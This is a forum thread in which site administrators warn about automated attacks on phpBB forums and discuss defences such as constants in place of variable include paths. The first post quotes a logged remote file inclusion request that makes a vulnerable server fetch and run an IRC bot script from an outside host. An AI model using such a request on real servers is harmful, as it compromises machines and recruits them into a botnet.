Announcement

Collapse
No announcement yet.

new phpbb irc bot

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • new phpbb irc bot

    Just posted to [email protected]

    Not sure if anyone's watching their httpd logs, but if you run phpBB,
    you're probably getting hit with a bunch of something like:
    /forum/admin/index.php?phpbb_root_path=http://www.kacaktc.com/webs/lol1.txt?

    It is, of course, an IRC bot. Started at around 11:30am EDT (GMT -4).
    *hates exploit coders with a passion*

  • #2
    Yeah I've been seeing a lot of these recently. Luckily I thought about this when we switched to relative paths and vBulletin doesn't have the problem thanks to constants.
    Scott MacVicar

    My Blog | Twitter

    Comment


    • #3
      What does it do? How was it put there?
      Arcade.gs Game Site!

      Comment


      • #4
        Originally posted by xjuliox View Post
        What does it do? How was it put there?
        I looked over the code, but couldn't find how it uses that GET to exploit anything. I didn't dig too hard into the code, however.

        As for what it does, it compromises the box and spawns an IRC client to join a botnet. There, it scans what ips the botmaster tells it to, and compromises those boxes, as well.

        Comment


        • #5
          Originally posted by Scott MacVicar View Post
          Yeah I've been seeing a lot of these recently. Luckily I thought about this when we switched to relative paths and vBulletin doesn't have the problem thanks to constants.
          So if I was coding something, how would I have it accept only relative paths?

          Comment


          • #6
            Thank YOU!!!
            Arcade.gs Game Site!

            Comment


            • #7
              Originally posted by Chousho View Post
              So if I was coding something, how would I have it accept only relative paths?
              You'd use a defined constant rather than a variable for a start then you would either have them define the directory or use getcwd to work it out.

              Or just use relative paths and dont fix it wit a variable.

              The exploit probably needs register_globals on so you can get it to work.
              Scott MacVicar

              My Blog | Twitter

              Comment


              • #8
                Originally posted by derfy View Post
                I looked over the code, but couldn't find how it uses that GET to exploit anything. I didn't dig too hard into the code, however.

                As for what it does, it compromises the box and spawns an IRC client to join a botnet. There, it scans what ips the botmaster tells it to, and compromises those boxes, as well.
                PHP Register Globals.

                Comment

                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                Working...
                X